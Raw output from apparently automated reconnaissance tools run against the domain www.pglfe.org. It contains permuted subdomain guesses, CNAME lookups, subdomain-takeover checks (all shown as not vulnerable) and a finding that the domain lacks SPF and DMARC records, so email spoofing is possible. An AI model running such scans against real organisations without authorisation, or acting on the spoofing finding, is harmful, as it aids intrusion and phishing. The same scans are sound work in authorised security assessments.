2419wwwb.pglfe.org
2420www-brand.pglfe.org
2421www.brand.pglfe.org
2422www-brasil.pglfe.org
2423www.brasil.pglfe.org
2424wwwbrasil.pglfe.org
2425www-brazil.pglfe.org
2426www.brazil.pglfe.org
2427wwwbrazil.pglfe.org
2428www-bucket.pglfe.org
2429www.bucket.pglfe.org
2430wwwbucket.pglfe.org
2431www-bucky.pglfe.org
2432wwwbucky.pglfe.org
2433www-cdn.pglfe.org
2434www.cdn.pglfe.org
2435wwwcdn.pglfe.org
2436www-cert.pglfe.org
2437www.cert.pglfe.org
2438wwwcert.pglfe.org
2439www-cf.pglfe.org
2440www.cf.pglfe.org
2441wwwcf.pglfe.org
2442www-cgi.pglfe.org
2443www.cgi.pglfe.org
2444www.chd.pglfe.org
2445www-chef.pglfe.org
2446www.chef.pglfe.org
2447wwwchef.pglfe.org
2448www-ci.pglfe.org
2449www.ci.pglfe.org
2450wwwci.pglfe.org
2451www-client.pglfe.org
2452wwwclient.pglfe.org
2453www-cloudfront.pglfe.org
2454www.cloudfront.pglfe.org
2455wwwcloudfront.pglfe.org
2456www-cms1.pglfe.org
2457www.cms1.pglfe.org
2458wwwcms1.pglfe.org
2459www-cms.pglfe.org
2460www.cms.pglfe.org
2461wwwcms.pglfe.org
2462www-cn.pglfe.org
2463www.cn.pglfe.org
2464wwwcn.pglfe.org
2465www-com.pglfe.org
2466www.com.pglfe.org
2467wwwcom.pglfe.org
2468www-confluence.pglfe.org
2469wwwconfluence.pglfe.org
2470www-container.pglfe.org
2471www.container.pglfe.org
2472wwwcontainer.pglfe.org
2473www.control.pglfe.org
2474wwwcontrol.pglfe.org
2475www-c.pglfe.org
2476wwwc.pglfe.org
2477www-cvs.pglfe.org
2478www.cvs.pglfe.org
2479wwwcvs.pglfe.org
2480www-data.pglfe.org
2481www.data.pglfe.org
2482www-dec.pglfe.org
2483www.dec.pglfe.org
2484wwwdec.pglfe.org
2485www-demo.pglfe.org
2486www.demo.pglfe.org
2487www-dev1.pglfe.org
2488www.dev1.pglfe.org
2489wwwdev1.pglfe.org
2490www-developer.pglfe.org
2491wwwdeveloper.pglfe.org
2492www-development.pglfe.org
2493www.development.pglfe.org
2494www-devops.pglfe.org
2495www.devops.pglfe.org
2496wwwdevops.pglfe.org
2497www-dev.pglfe.org
2498www.dev.pglfe.org
2499wwwdev.pglfe.org
2500www.devs.pglfe.org
2501wwwdevs.pglfe.org
2502www-disabled.pglfe.org
2503www.disabled.pglfe.org
2504wwwdisabled.pglfe.org
2505www-docker.pglfe.org
2506www.docker.pglfe.org
2507wwwdocker.pglfe.org
2508www-docsdrop.pglfe.org
2509www.docsdrop.pglfe.org
2510www-docs.pglfe.org
2511www.docs.pglfe.org
2512wwwdocs.pglfe.org
2513www-drop.pglfe.org
2514wwwdrop.pglfe.org
2515www.edge.pglfe.org
2516wwwedge.pglfe.org
2517www-elasticbeanstalk.pglfe.org
2518www.elasticbeanstalk.pglfe.org
2519wwwelasticbeanstalk.pglfe.org
2520www-elastic.pglfe.org
2521www.elastic.pglfe.org
2522wwwelastic.pglfe.org
2523www-elb.pglfe.org
2524www.elb.pglfe.org
2525wwwelb.pglfe.org
2526wwwemail.pglfe.org
2527www-emea.pglfe.org
2528www.emea.pglfe.org
2529wwwemea.pglfe.org
2530www-engima.pglfe.org
2531www.engima.pglfe.org
2532wwwengima.pglfe.org
2533www-engineering.pglfe.org
2534www.engineering.pglfe.org
2535wwwengineering.pglfe.org
2536www-engine.pglfe.org
2537www.engine.pglfe.org
2538wwwengine.pglfe.org
2539www-eng.pglfe.org
2540www.eng.pglfe.org
2541wwweng.pglfe.org
2542www-eu.pglfe.org
2543www.eu.pglfe.org
2544wwweu.pglfe.org
2545www-europe.pglfe.org
2546www.europe.pglfe.org
2547wwweurope.pglfe.org
2548www-europewest.pglfe.org
2549www.europewest.pglfe.org
2550wwweuropewest.pglfe.org
2551www-euwe.pglfe.org
2552www.euwe.pglfe.org
2553wwweuwe.pglfe.org
2554www-euw.pglfe.org
2555www.euw.pglfe.org
2556wwweuw.pglfe.org
2557www-evelynn.pglfe.org
2558www.evelynn.pglfe.org
2559wwwevelynn.pglfe.org
2560www-events.pglfe.org
2561www.events.pglfe.org
2562wwwevents.pglfe.org
2563www-ext.pglfe.org
2564www.ext.pglfe.org
2565wwwext.pglfe.org
2566www-feb.pglfe.org
2567www.feb.pglfe.org
2568wwwfeb.pglfe.org
2569www-fet.pglfe.org
2570www.fet.pglfe.org
2571wwwfet.pglfe.org
2572www-firewall.pglfe.org
2573www.firewall.pglfe.org
2574wwwfirewall.pglfe.org
2575www.forms.pglfe.org
2576wwwforms.pglfe.org
2577www-forum.pglfe.org
2578www.forum.pglfe.org
2579wwwforum.pglfe.org
2580www-frontpage.pglfe.org
2581www.frontpage.pglfe.org
2582wwwfrontpage.pglfe.org
2583www-fw.pglfe.org
2584www.fw.pglfe.org
2585wwwfw.pglfe.org
2586www-games.pglfe.org
2587www.games.pglfe.org
2588wwwgames.pglfe.org
2589www.gateway.pglfe.org
2590wwwgateway.pglfe.org
2591www-germany.pglfe.org
2592www.germany.pglfe.org
2593wwwgermany.pglfe.org
2594www.ghcpi.pglfe.org
2595wwwghcpi.pglfe.org
2596www-gh.pglfe.org
2597www.gh.pglfe.org
2598wwwgh.pglfe.org
2599www-gist.pglfe.org
2600www.gist.pglfe.org
2601wwwgist.pglfe.org
2602www-github.pglfe.org
2603www.github.pglfe.org
2604www-gitlab.pglfe.org
2605www.gitlab.pglfe.org
2606wwwgitlab.pglfe.org
2607www-git.pglfe.org
2608www.git.pglfe.org
2609wwwgit.pglfe.org
2610www-global.pglfe.org
2611www.global.pglfe.org
2612wwwglobal.pglfe.org
2613www-gw.pglfe.org
2614www.gw.pglfe.org
2615wwwgw.pglfe.org
2616www-help.pglfe.org
2617www.help.pglfe.org
2618wwwhelp.pglfe.org
2619www-hkg.pglfe.org
2620www.hkg.pglfe.org
2621wwwhkg.pglfe.org
2622www-hwcdn.pglfe.org
2623www.hwcdn.pglfe.org
2624wwwhwcdn.pglfe.org
2625www-hw.pglfe.org
2626www.hw.pglfe.org
2627wwwhw.pglfe.org
2628www-iad.pglfe.org
2629www.iad.pglfe.org
2630wwwiad.pglfe.org
2631www-ids.pglfe.org
2632www.ids.pglfe.org
2633wwwids.pglfe.org
2634www.internal.pglfe.org
2635wwwinternal.pglfe.org
2636www-int.pglfe.org
2637www.int.pglfe.org
2638wwwint.pglfe.org
2639www-i.pglfe.org
2640www.i.pglfe.org
2641wwwi.pglfe.org
2642www.jenkins.pglfe.org
2643wwwjenkins.pglfe.org
2644www-jinx.pglfe.org
2645www.jinx.pglfe.org
2646wwwjinx.pglfe.org
2647www-july.pglfe.org
2648www.july.pglfe.org
2649wwwjuly.pglfe.org
2650www-june.pglfe.org
2651www.june.pglfe.org
2652wwwjune.pglfe.org
2653www-korea.pglfe.org
2654www.korea.pglfe.org
2655wwwkorea.pglfe.org
2656www-kor.pglfe.org
2657wwwkor.pglfe.org
2658www-kr.pglfe.org
2659www.kr.pglfe.org
2660wwwkr.pglfe.org
2661www-lab.pglfe.org
2662www.lab.pglfe.org
2663wwwlab.pglfe.org
2664www-lan.pglfe.org
2665www.lan.pglfe.org
2666wwwlan.pglfe.org
2667www-las.pglfe.org
2668www.las.pglfe.org
2669wwwlas.pglfe.org
2670www.latinamerica.pglfe.org
2671wwwlatinamerica.pglfe.org
2672www.latin.pglfe.org
2673wwwlatin.pglfe.org
2674www-lax1.pglfe.org
2675www.lax1.pglfe.org
2676wwwlax1.pglfe.org
2677www-lax.pglfe.org
2678wwwlax.pglfe.org
2679www-lb.pglfe.org
2680www.lb.pglfe.org
2681wwwlb.pglfe.org
2682www.legacy.pglfe.org
2683wwwlegacy.pglfe.org
2684www-loadbalancer.pglfe.org
2685www.loadbalancer.pglfe.org
2686wwwloadbalancer.pglfe.org
2687www-login.pglfe.org
2688www.login.pglfe.org
2689wwwlogin.pglfe.org
2690www-machine.pglfe.org
2691www.machine.pglfe.org
2692wwwmachine.pglfe.org
2693www-mail.pglfe.org
2694www.mail.pglfe.org
2695wwwmail.pglfe.org
2696www-march.pglfe.org
2697www.march.pglfe.org
2698wwwmarch.pglfe.org
2699www-merch.pglfe.org
2700www.merch.pglfe.org
2701wwwmerch.pglfe.org
2702www-metrics.pglfe.org
2703www.metrics.pglfe.org
2704wwwmetrics.pglfe.org
2705www-mirror.pglfe.org
2706www.mirror.pglfe.org
2707wwwmirror.pglfe.org
2708www-na.pglfe.org
2709www.na.pglfe.org
2710wwwna.pglfe.org
2711www-nautilus.pglfe.org
2712www.nautilus.pglfe.org
2713wwwnautilus.pglfe.org
2714wwwnetherlands.pglfe.org
2715www-net.pglfe.org
2716www.net.pglfe.org
2717wwwnet.pglfe.org
2718www.nginx.pglfe.org
2719wwwnginx.pglfe.org
2720www-nl.pglfe.org
2721www.nl.pglfe.org
2722wwwnl.pglfe.org
2723www-node.pglfe.org
2724www.node.pglfe.org
2725www-northamerica.pglfe.org
2726www.northamerica.pglfe.org
2727wwwnorthamerica.pglfe.org
2728www-nov.pglfe.org
2729www.nov.pglfe.org
2730wwwnov.pglfe.org
2731www-oceania.pglfe.org
2732www.oceania.pglfe.org
2733wwwoceania.pglfe.org
2734www-oct.pglfe.org
2735www.oct.pglfe.org
2736www-oid.pglfe.org
2737www.oid.pglfe.org
2738wwwoid.pglfe.org
2739www-ops.pglfe.org
2740www.ops.pglfe.org
2741wwwops.pglfe.org
2742www-org.pglfe.org
2743www.org.pglfe.org
2744wwworg.pglfe.org
2745www-origin.pglfe.org
2746www.origin.pglfe.org
2747www-page.pglfe.org
2748www.page.pglfe.org
2749wwwpage.pglfe.org
2750www-pantheon.pglfe.org
2751wwwpantheon.pglfe.org
2752www-partner.pglfe.org
2753www.partner.pglfe.org
2754wwwpartner.pglfe.org
2755www-pass.pglfe.org
2756www.pass.pglfe.org
2757wwwpass.pglfe.org
2758www-payment.pglfe.org
2759www.payment.pglfe.org
2760wwwpayment.pglfe.org
2761www-pay.pglfe.org
2762www.pay.pglfe.org
2763wwwpay.pglfe.org
2764www-pc.pglfe.org
2765wwwpc.pglfe.org
2766www.pglfe.org
2767www.php.pglfe.org
2768wwwphp.pglfe.org
2769www-pl.pglfe.org
2770www.pl.pglfe.org
2771wwwpl.pglfe.org
2772www-poland.pglfe.org
2773www.poland.pglfe.org
2774wwwpoland.pglfe.org
2775www-prd.pglfe.org
2776www.prd.pglfe.org
2777wwwprd.pglfe.org
2778www-preferences.pglfe.org
2779www.preferences.pglfe.org
2780www-preview.pglfe.org
2781www.preview.pglfe.org
2782wwwpreview.pglfe.org
2783www-private.pglfe.org
2784www.private.pglfe.org
2785wwwprivate.pglfe.org
2786www-priv.pglfe.org
2787www.priv.pglfe.org
2788wwwpriv.pglfe.org
2789www-prod.pglfe.org
2790www.prod.pglfe.org
2791wwwprod.pglfe.org
2792www-production.pglfe.org
2793wwwproduction.pglfe.org
2794www-productions.pglfe.org
2795www.productions.pglfe.org
2796www-profile.pglfe.org
2797www.profile.pglfe.org
2798www-profiles.pglfe.org
2799www.profiles.pglfe.org
2800wwwprofiles.pglfe.org
2801www-promo.pglfe.org
2802www.promo.pglfe.org
2803wwwpromo.pglfe.org
2804www-promotion.pglfe.org
2805www.promotion.pglfe.org
2806wwwpromotion.pglfe.org
2807www-proxy.pglfe.org
2808www.proxy.pglfe.org
2809www.raw.pglfe.org
2810wwwraw.pglfe.org
2811www-redirector.pglfe.org
2812www.redirector.pglfe.org
2813wwwredirector.pglfe.org
2814www-redir.pglfe.org
2815www.redir.pglfe.org
2816wwwredir.pglfe.org
2817www-region.pglfe.org
2818www.region.pglfe.org
2819wwwregion.pglfe.org
2820www.repo.pglfe.org
2821wwwrepo.pglfe.org
2822www-repository.pglfe.org
2823www.repository.pglfe.org
2824wwwrepository.pglfe.org
2825www-reset.pglfe.org
2826www.reset.pglfe.org
2827wwwreset.pglfe.org
2828www-restricted.pglfe.org
2829www.restricted.pglfe.org
2830wwwrestricted.pglfe.org
2831www-restrict.pglfe.org
2832www.restrict.pglfe.org
2833wwwrestrict.pglfe.org
2834www-reviews.pglfe.org
2835www.reviews.pglfe.org
2836www-s3.pglfe.org
2837www.s3.pglfe.org
2838wwws3.pglfe.org
2839www-sandbox.pglfe.org
2840wwwsandbox.pglfe.org
2841www-scm.pglfe.org
2842www.scm.pglfe.org
2843wwwscm.pglfe.org
2844www-search.pglfe.org
2845www.search.pglfe.org
2846wwwsearch.pglfe.org
2847www-secure.pglfe.org
2848www.secure.pglfe.org
2849wwwsecure.pglfe.org
2850www-security.pglfe.org
2851www.security.pglfe.org
2852wwwsecurity.pglfe.org
2853www-sept.pglfe.org
2854www.sept.pglfe.org
2855wwwsept.pglfe.org
2856www-server.pglfe.org
2857www.server.pglfe.org
2858wwwserver.pglfe.org
2859www-service.pglfe.org
2860www.service.pglfe.org
2861wwwservice.pglfe.org
2862www-signed.pglfe.org
2863www.signed.pglfe.org
2864wwwsigned.pglfe.org
2865www-singed.pglfe.org
2866www.singed.pglfe.org
2867wwwsinged.pglfe.org
2868www-skins.pglfe.org
2869www.skins.pglfe.org
2870www.s.pglfe.org
2871wwws.pglfe.org
2872www-spring.pglfe.org
2873wwwspring.pglfe.org
2874www-ssl.pglfe.org
2875www.ssl.pglfe.org
2876wwwssl.pglfe.org
2877www-staff.pglfe.org
2878www.staff.pglfe.org
2879wwwstaff.pglfe.org
2880www-stage1.pglfe.org
2881www.stage1.pglfe.org
2882wwwstage1.pglfe.org
2883www-stage.pglfe.org
2884www.stage.pglfe.org
2885wwwstage.pglfe.org
2886www-staging.pglfe.org
2887www.staging.pglfe.org
2888wwwstaging.pglfe.org
2889www-static.pglfe.org
2890www.static.pglfe.org
2891wwwstatic.pglfe.org
2892www-stg.pglfe.org
2893www.stg.pglfe.org
2894wwwstg.pglfe.org
2895www-support.pglfe.org
2896www.support.pglfe.org
2897wwwsupport.pglfe.org
2898www-svcgateway.pglfe.org
2899www.svcgateway.pglfe.org
2900wwwsvcgateway.pglfe.org
2901www-svc.pglfe.org
2902www.svc.pglfe.org
2903wwwsvc.pglfe.org
2904www-swagger.pglfe.org
2905wwwswagger.pglfe.org
2906www-system.pglfe.org
2907wwwsystem.pglfe.org
2908www-team.pglfe.org
2909www.team.pglfe.org
2910wwwteam.pglfe.org
2911www-test1.pglfe.org
2912www.test1.pglfe.org
2913wwwtest1.pglfe.org
2914www.testbed.pglfe.org
2915wwwtestbed.pglfe.org
2916www-testing1.pglfe.org
2917www.testing1.pglfe.org
2918wwwtesting1.pglfe.org
2919www-testing.pglfe.org
2920www.testing.pglfe.org
2921wwwtesting.pglfe.org
2922www-test.pglfe.org
2923www.test.pglfe.org
2924wwwtest.pglfe.org
2925www-tomcat.pglfe.org
2926www.tomcat.pglfe.org
2927wwwtomcat.pglfe.org
2928www-toolbar.pglfe.org
2929www.toolbar.pglfe.org
2930wwwtoolbar.pglfe.org
2931www-tpe.pglfe.org
2932www.tpe.pglfe.org
2933www-t.pglfe.org
2934wwwt.pglfe.org
2935www-training.pglfe.org
2936www.training.pglfe.org
2937wwwtraining.pglfe.org
2938www.train.pglfe.org
2939wwwtrain.pglfe.org
2940www-trial.pglfe.org
2941www.trial.pglfe.org
2942wwwtrial.pglfe.org
2943www-tr.pglfe.org
2944www.tr.pglfe.org
2945wwwtr.pglfe.org
2946www.turkey.pglfe.org
2947wwwturkey.pglfe.org
2948www.turk.pglfe.org
2949wwwturk.pglfe.org
2950wwwtur.pglfe.org
2951www-twitch.pglfe.org
2952www.twitch.pglfe.org
2953wwwtwitch.pglfe.org
2954www.uat.pglfe.org
2955www-us.pglfe.org
2956www.us.pglfe.org
2957wwwus.pglfe.org
2958www-v1.pglfe.org
2959www.v1.pglfe.org
2960wwwv1.pglfe.org
2961www-v2.pglfe.org
2962www.v2.pglfe.org
2963wwwv2.pglfe.org
2964www.v3.pglfe.org
2965www-vi.pglfe.org
2966www.vi.pglfe.org
2967wwwvi.pglfe.org
2968www-v.pglfe.org
2969www.v.pglfe.org
2970wwwv.pglfe.org
2971www-vpn.pglfe.org
2972www.vpn.pglfe.org
2973wwwvpn.pglfe.org
2974www-w3.pglfe.org
2975www.w3.pglfe.org
2976wwww3.pglfe.org
2977www-web1.pglfe.org
2978www.web1.pglfe.org
2979wwwweb1.pglfe.org
2980www-webapp.pglfe.org
2981www.webapp.pglfe.org
2982wwwwebapp.pglfe.org
2983www-web.pglfe.org
2984www.web.pglfe.org
2985wwwweb.pglfe.org
2986www-westeurope.pglfe.org
2987www.westeurope.pglfe.org
2988wwwwesteurope.pglfe.org
2989www-www3.pglfe.org
2990wwwwww3.pglfe.org
2991www-www.pglfe.org
2992www.www.pglfe.org
2993wwwwww.pglfe.org
2994www-z.pglfe.org
2995www.z.pglfe.org
2996wwwz.pglfe.org
2997z-www.pglfe.org
2998z.www.pglfe.org
2999zwww.pglfe.org
3000192.252.144.58
#######################################################################################################################################
[+] www.pglfe.org has no SPF record!
[*] No DMARC record found. Looking for organizational record
[+] No organizational DMARC record
[+] Spoofing possible for www.pglfe.org!
#######################################################################################################################################
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> github-www.pglfe.org CNAME
;github-www.pglfe.org. IN CNAME
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> github.www.pglfe.org CNAME
;github.www.pglfe.org. IN CNAME
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> githubwww.pglfe.org CNAME
;githubwww.pglfe.org. IN CNAME
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> www-github.pglfe.org CNAME
;www-github.pglfe.org. IN CNAME
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> www.github.pglfe.org CNAME
;www.github.pglfe.org. IN CNAME
dig: '.www.pglfe.org' is not a legal name (empty label)
#######################################################################################################################################
3381[Not Vulnerable] gitlab.www.pglfe.org
3382[Not Vulnerable] gitlabwww.pglfe.org
3383[Not Vulnerable] git-www.pglfe.org
3384[Not Vulnerable] global.www.pglfe.org
3385[Not Vulnerable] globalwww.pglfe.org
3386[Not Vulnerable] gw-www.pglfe.org
3387[Not Vulnerable] gwwww.pglfe.org
3388[Not Vulnerable] helpwww.pglfe.org
3389[Not Vulnerable] hkg-www.pglfe.org
3390[Not Vulnerable] hkg.www.pglfe.org
3391[Not Vulnerable] hwcdn-www.pglfe.org
3392[Not Vulnerable] help-www.pglfe.org
3393[Not Vulnerable] hwcdn.www.pglfe.org
3394[Not Vulnerable] hwcdnwww.pglfe.org
3395[Not Vulnerable] iad-www.pglfe.org
3396[Not Vulnerable] iad.www.pglfe.org
3397[Not Vulnerable] iadwww.pglfe.org
3398[Not Vulnerable] ids-www.pglfe.org
3399[Not Vulnerable] ids.www.pglfe.org
3400[Not Vulnerable] idswww.pglfe.org
3401[Not Vulnerable] internal-www.pglfe.org
3402[Not Vulnerable] internal.www.pglfe.org
3403[Not Vulnerable] int-www.pglfe.org
3404[Not Vulnerable] int.www.pglfe.org
3405[Not Vulnerable] intwww.pglfe.org
3406[Not Vulnerable] i-www.pglfe.org
3407[Not Vulnerable] i.www.pglfe.org
3408[Not Vulnerable] iwww.pglfe.org
3409[Not Vulnerable] jenkins-www.pglfe.org
3410[Not Vulnerable] las-www.pglfe.org
3411[Not Vulnerable] latinamerica.www.pglfe.org
3412[Not Vulnerable] lab-www.pglfe.org
3413[Not Vulnerable] lab.www.pglfe.org
3414[Not Vulnerable] lan-www.pglfe.org
3415[Not Vulnerable] krwww.pglfe.org
3416[Not Vulnerable] lan.www.pglfe.org
3417[Not Vulnerable] latinamericawww.pglfe.org
3418[Not Vulnerable] latin-www.pglfe.org
3419[Not Vulnerable] jenkins.www.pglfe.org
3420[Not Vulnerable] jenkinswww.pglfe.org
3421[Not Vulnerable] jinx-www.pglfe.org
3422[Not Vulnerable] jinx.www.pglfe.org
3423[Not Vulnerable] lanwww.pglfe.org
3424[Not Vulnerable] latin.www.pglfe.org
3425[Not Vulnerable] jinxwww.pglfe.org
3426[Not Vulnerable] july-www.pglfe.org
3427[Not Vulnerable] july.www.pglfe.org
3428[Not Vulnerable] june-www.pglfe.org
3429[Not Vulnerable] lax1.www.pglfe.org
3430[Not Vulnerable] junewww.pglfe.org
3431[Not Vulnerable] korea.www.pglfe.org
3432[Not Vulnerable] korea-www.pglfe.org
3433[Not Vulnerable] lax1www.pglfe.org
3434[Not Vulnerable] julywww.pglfe.org
3435[Not Vulnerable] koreawww.pglfe.org
3436[Not Vulnerable] kor-www.pglfe.org
3437[Not Vulnerable] lax.www.pglfe.org
3438[Not Vulnerable] laxwww.pglfe.org
3439[Not Vulnerable] lb-www.pglfe.org
3440[Not Vulnerable] lb.www.pglfe.org
3441[Not Vulnerable] kor.www.pglfe.org
3442[Not Vulnerable] lbwww.pglfe.org
3443[Not Vulnerable] kr-www.pglfe.org
3444[Not Vulnerable] kr.www.pglfe.org
3445[Not Vulnerable] legacy-www.pglfe.org
3446[Not Vulnerable] legacy.www.pglfe.org
3447[Not Vulnerable] loadbalancerwww.pglfe.org
3448[Not Vulnerable] lax-www.pglfe.org
3449[Not Vulnerable] machinewww.pglfe.org
3450[Not Vulnerable] mailwww.pglfe.org
3451[Not Vulnerable] mail.www.pglfe.org
3452[Not Vulnerable] marchwww.pglfe.org
3453[Not Vulnerable] mail-www.pglfe.org
3454[Not Vulnerable] las.www.pglfe.org
3455[Not Vulnerable] latinamerica-www.pglfe.org
3456[Not Vulnerable] mirror.www.pglfe.org
3457[Not Vulnerable] mirror-www.pglfe.org
3458[Not Vulnerable] mirrorwww.pglfe.org
3459[Not Vulnerable] loadbalancer-www.pglfe.org
3460[Not Vulnerable] nautilus-www.pglfe.org
3461[Not Vulnerable] nautilus.www.pglfe.org
3462[Not Vulnerable] nautiluswww.pglfe.org
3463[Not Vulnerable] loadbalancer.www.pglfe.org
3464[Not Vulnerable] na-www.pglfe.org
3465[Not Vulnerable] login-www.pglfe.org
3466[Not Vulnerable] latinwww.pglfe.org
3467[Not Vulnerable] node-www.pglfe.org
3468[Not Vulnerable] nlwww.pglfe.org
3469[Not Vulnerable] node.www.pglfe.org
3470[Not Vulnerable] northamerica-www.pglfe.org
3471[Not Vulnerable] northamerica.www.pglfe.org
3472[Not Vulnerable] na.www.pglfe.org
3473[Not Vulnerable] northamericawww.pglfe.org
3474[Not Vulnerable] net-www.pglfe.org
3475[Not Vulnerable] nawww.pglfe.org
3476[Not Vulnerable] netherlandswww.pglfe.org
3477[Not Vulnerable] netwww.pglfe.org
3478[Not Vulnerable] net.www.pglfe.org
3479[Not Vulnerable] loginwww.pglfe.org
3480[Not Vulnerable] nginx.www.pglfe.org
3481[Not Vulnerable] nginx-www.pglfe.org
3482[Not Vulnerable] nl.www.pglfe.org
3483[Not Vulnerable] machine.www.pglfe.org
3484[Not Vulnerable] nginxwww.pglfe.org
3485[Not Vulnerable] nl-www.pglfe.org
3486[Not Vulnerable] march.www.pglfe.org
3487[Not Vulnerable] machine-www.pglfe.org
3488[Not Vulnerable] nodewww.pglfe.org
3489[Not Vulnerable] nov-www.pglfe.org
3490[Not Vulnerable] merch-www.pglfe.org
3491[Not Vulnerable] nov.www.pglfe.org
3492[Not Vulnerable] merch.www.pglfe.org
3493[Not Vulnerable] oceania-www.pglfe.org
3494[Not Vulnerable] metrics-www.pglfe.org
3495[Not Vulnerable] metrics.www.pglfe.org
3496[Not Vulnerable] oceania.www.pglfe.org
3497[Not Vulnerable] metricswww.pglfe.org
3498[Not Vulnerable] merchwww.pglfe.org
3499[Not Vulnerable] oceaniawww.pglfe.org
3500[Not Vulnerable] oct-www.pglfe.org
3501[Not Vulnerable] oct.www.pglfe.org
3502[Not Vulnerable] oid-www.pglfe.org
3503[Not Vulnerable] pagewww.pglfe.org
3504[Not Vulnerable] pantheon.www.pglfe.org
3505[Not Vulnerable] pantheonwww.pglfe.org
3506[Not Vulnerable] partner-www.pglfe.org
3507[Not Vulnerable] netherlands-www.pglfe.org
3508[Not Vulnerable] payment.www.pglfe.org
3509[Not Vulnerable] pay.www.pglfe.org
3510[Not Vulnerable] pc-www.pglfe.org
3511[Not Vulnerable] pc.www.pglfe.org
3512[Not Vulnerable] payment-www.pglfe.org
3513[Not Vulnerable] pcwww.pglfe.org
3514[Not Vulnerable] paymentwww.pglfe.org
3515[Not Vulnerable] php-www.pglfe.org
3516[Not Vulnerable] phpwww.pglfe.org
3517[Not Vulnerable] oid.www.pglfe.org
3518[Not Vulnerable] oidwww.pglfe.org
3519[Not Vulnerable] ops-www.pglfe.org
3520[Not Vulnerable] ops.www.pglfe.org
3521[Not Vulnerable] opswww.pglfe.org
3522[Not Vulnerable] org.www.pglfe.org
3523[Not Vulnerable] orgwww.pglfe.org
3524[Not Vulnerable] originwww.pglfe.org
3525[Not Vulnerable] page-www.pglfe.org
3526[Not Vulnerable] preferences-www.pglfe.org
3527[Not Vulnerable] org-www.pglfe.org
3528[Not Vulnerable] partner.www.pglfe.org
3529[Not Vulnerable] partnerwww.pglfe.org
3530[Not Vulnerable] pass-www.pglfe.org
3531[Not Vulnerable] pass.www.pglfe.org
3532[Not Vulnerable] passwww.pglfe.org
3533[Not Vulnerable] php.www.pglfe.org
3534[Not Vulnerable] plwww.pglfe.org
3535[Not Vulnerable] poland.www.pglfe.org
3536[Not Vulnerable] poland-www.pglfe.org
3537[Not Vulnerable] polandwww.pglfe.org
3538[Not Vulnerable] prd-www.pglfe.org
3539[Not Vulnerable] prd.www.pglfe.org
3540[Not Vulnerable] prdwww.pglfe.org
3541[Not Vulnerable] preferences.www.pglfe.org
3542[Not Vulnerable] preferenceswww.pglfe.org
3543[Not Vulnerable] preview-www.pglfe.org
3544[Not Vulnerable] preview.www.pglfe.org
3545[Not Vulnerable] previewwww.pglfe.org
3546[Not Vulnerable] private-www.pglfe.org
3547[Not Vulnerable] prodwww.pglfe.org
3548[Not Vulnerable] profile.www.pglfe.org
3549[Not Vulnerable] promotion.www.pglfe.org
3550[Not Vulnerable] promo.www.pglfe.org
3551[Not Vulnerable] promowww.pglfe.org
3552[Not Vulnerable] proxy.www.pglfe.org
3553[Not Vulnerable] raw.www.pglfe.org
3554[Not Vulnerable] rawwww.pglfe.org
3555[Not Vulnerable] redirector-www.pglfe.org
3556[Not Vulnerable] promotion-www.pglfe.org
3557[Not Vulnerable] private.www.pglfe.org
3558[Not Vulnerable] privatewww.pglfe.org
3559[Not Vulnerable] priv.www.pglfe.org
3560[Not Vulnerable] redir-www.pglfe.org
3561[Not Vulnerable] productions-www.pglfe.org
3562[Not Vulnerable] priv-www.pglfe.org
3563[Not Vulnerable] region-www.pglfe.org
3564[Not Vulnerable] production-www.pglfe.org
3565[Not Vulnerable] productionswww.pglfe.org
3566[Not Vulnerable] region.www.pglfe.org
3567[Not Vulnerable] production.www.pglfe.org
3568[Not Vulnerable] prod-www.pglfe.org
3569[Not Vulnerable] prod.www.pglfe.org
3570[Not Vulnerable] regionwww.pglfe.org
3571[Not Vulnerable] repository-www.pglfe.org
3572[Not Vulnerable] productionwww.pglfe.org
3573[Not Vulnerable] profiles-www.pglfe.org
3574[Not Vulnerable] repository.www.pglfe.org
3575[Not Vulnerable] profiles.www.pglfe.org
3576[Not Vulnerable] profileswww.pglfe.org
3577[Not Vulnerable] profilewww.pglfe.org
3578[Not Vulnerable] resetdatawww.pglfe.org
3579[Not Vulnerable] resetdata-www.pglfe.org
3580[Not Vulnerable] reset-www.pglfe.org
3581[Not Vulnerable] reset.www.pglfe.org
3582[Not Vulnerable] reviews-www.pglfe.org
3583[Not Vulnerable] reviews.www.pglfe.org
3584[Not Vulnerable] promotionwww.pglfe.org
3585[Not Vulnerable] reviewswww.pglfe.org
3586[Not Vulnerable] s3.www.pglfe.org
3587[Not Vulnerable] proxy-www.pglfe.org
3588[Not Vulnerable] scm-www.pglfe.org
3589[Not Vulnerable] proxywww.pglfe.org
3590[Not Vulnerable] raw-www.pglfe.org
3591[Not Vulnerable] scm.www.pglfe.org
3592[Not Vulnerable] repo-www.pglfe.org
3593[Not Vulnerable] redirector.www.pglfe.org
3594[Not Vulnerable] repo.www.pglfe.org
3595[Not Vulnerable] redirectorwww.pglfe.org
3596[Not Vulnerable] redir.www.pglfe.org
3597[Not Vulnerable] redirwww.pglfe.org
3598[Not Vulnerable] securitywww.pglfe.org
3599[Not Vulnerable] sept-www.pglfe.org
3600[Not Vulnerable] server-www.pglfe.org
3601[Not Vulnerable] server.www.pglfe.org
3602[Not Vulnerable] search-www.pglfe.org
3603[Not Vulnerable] search.www.pglfe.org
3604[Not Vulnerable] scmwww.pglfe.org
3605[Not Vulnerable] searchwww.pglfe.org
3606[Not Vulnerable] secure-www.pglfe.org
3607[Not Vulnerable] repowww.pglfe.org
3608[Not Vulnerable] signed-www.pglfe.org
3609[Not Vulnerable] securewww.pglfe.org
3610[Not Vulnerable] secure.www.pglfe.org
3611[Not Vulnerable] security.www.pglfe.org
3612[Not Vulnerable] signed.www.pglfe.org
3613[Not Vulnerable] security-www.pglfe.org
3614[Not Vulnerable] resetwww.pglfe.org
3615[Not Vulnerable] septwww.pglfe.org
3616[Not Vulnerable] restricted.www.pglfe.org
3617[Not Vulnerable] restricted-www.pglfe.org
3618[Not Vulnerable] signedwww.pglfe.org
3619[Not Vulnerable] singed-www.pglfe.org
3620[Not Vulnerable] restrictedwww.pglfe.org
3621[Not Vulnerable] restrict-www.pglfe.org
3622[Not Vulnerable] restrict.www.pglfe.org
3623[Not Vulnerable] restrictwww.pglfe.org
3624[Not Vulnerable] skins-www.pglfe.org
3625[Not Vulnerable] sandbox-www.pglfe.org
3626[Not Vulnerable] skinswww.pglfe.org
